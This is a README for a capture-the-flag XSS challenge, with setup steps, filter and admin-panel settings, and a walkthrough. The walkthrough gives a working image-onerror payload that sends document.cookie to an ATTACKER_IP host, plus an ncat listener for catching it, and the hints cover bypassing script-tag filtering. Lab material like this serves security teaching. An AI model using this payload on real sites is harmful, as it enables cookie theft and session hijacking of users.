# It's just text

## Setup

1. Set the flag in `run.sh`.
1. Execute `run.sh`.

### Additional configuration

- `app/config.py`:
  - Change the difficulty of successful XSS by specifying strings that will
    be removed in `FILTER`.
  - Enable the Super Secret Admin Panel, where all messages are listed, by
    setting `SUPER_SECRET_ADMIN_PANEL` to `True` (or `False` to disable).
    It is available at `/messages` if the flag cookie (name:
    `flag`, value: `flag`) is set. This page escapes code html, but there are
    links to the unescaped versions.

## Walkthrough

1. Click on `<Contact us>` to get to the message page
1. Listen to incoming traffic on your machine (`ncat -lk 1337`).
1. Enter an email address and a message like `<img src=invalid onerror="this.onerror=''; this.src='http://<ATTACKER_IP>:1337/' + escape(document.cookie)" />`
1. Decode the cookie.

## Hints

- Debug your script using the message link displayed after sending a message.
- `<script>...</script>` does not work: Maybe some tags get removed. Use
  something else.
- Maybe you can convince the admin to deliver the flag to you.